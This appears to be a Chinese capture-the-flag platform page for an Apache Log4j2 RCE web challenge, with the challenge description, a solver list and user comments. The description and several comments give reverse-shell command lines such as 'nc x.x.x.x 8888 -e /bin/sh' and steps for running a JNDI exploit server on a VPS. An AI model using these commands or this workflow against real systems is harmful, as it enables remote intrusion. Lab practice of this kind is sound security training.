Apache Log4j2 RCEWEB 未解决
分数:
25
金币:
3
题目作者:
云牧青
一 血:
yeedo
一血奖励:
8金币
解 决:
563
提 示:
人太多了服务器性能有点满了,启动不起来的 过一会再启动就可以了。
描 述:
/bin/bash:x ;
/bin/sh √ ;
/dev/tcp × ;
nc -e x ;
nc a.cc 1234 -e √ ;
评分(6)
解题动态
暗流安全 攻破了该题 9天前
枪王小弟 攻破了该题 17天前
老兵烧烤 攻破了该题 17天前
蓝色 攻破了该题 18天前
aqwzaa 攻破了该题 20天前
dlgz 攻破了该题 21天前
kr2yh 攻破了该题 1月前
Arno_Zoffy 攻破了该题 2月前
ykssorin 攻破了该题 2月前
Aromatic 攻破了该题 2月前
小马哥 攻破了该题 2月前
jerryxucy 攻破了该题 2月前
w111 攻破了该题 2月前
bin7 攻破了该题 4月前
t0ur1st 攻破了该题 4月前
geri 攻破了该题 4月前
SkyAsh 攻破了该题 4月前
她说我们只是朋友 攻破了该题 4月前
网恋秀牛子被录屏导致自卑 攻破了该题 5月前
评论
暗流安全 9天前
举报
1.使用java8命令 java8 -jar JNDIExploit-1.2-SNAPSHOT.jar -i x.x.x.x -p 8180 2.开放vps端口 8180、1389、8888 3.反弹shell使用 nc x.x.x.x 8888 -e /bin/sh
kr2yh 1月前
举报
后端业务中log时 遇见${} 触发log4j的lookup机制 jndi协议固定 远程加载class并实例化到本地内存中,触发nc 反弹shell
admin999 8月前
举报
我这个内网穿透免费的只有udp通道,但是nc的时候用udp会报错,后面买了阿里云一次过
daye8ku 11月前
举报
dnslog成功了,其余是真不行
KKsama 12月前
举报
白嫖阿里云服务器一年 https://university.aliyun.com/
TTONya 1年前
举报
注意几点 1. 题目说了不能用用bash,所以我们构造的payload不能有bash相关的命令,要全部换为sh 2. 同样的,题目说了-e选项要放到后面,所以这里同样也要放到后面,示例命令 nc 1.1.1.1 1111 -e /bin/sh 3. 注意攻击机的jdk版本,尽量使用java8,刚开始我用java17跑了好几遍没通 希望对大家有帮助
tingsi464 1年前
举报
不买个虚拟主机还真难搞这个
VFlame 1年前
举报
反弹shell不成功,用vps开JNDIExploit-1.2-SNAPSHOT.jar,JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar,都没有反弹shell回来
lotuswhite 1年前
举报
不知道为什么,作者大大wp里的JNDIExploit-1.2-SNAPSHOT.jar反弹shell不成功,但是百度大佬wp里的JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar成功了。我的6金币呜呜
genius4282 2年前
举报
裂开,不如自己搭建个本地的复现效率高,同样的步骤,在这里就搞不了还麻烦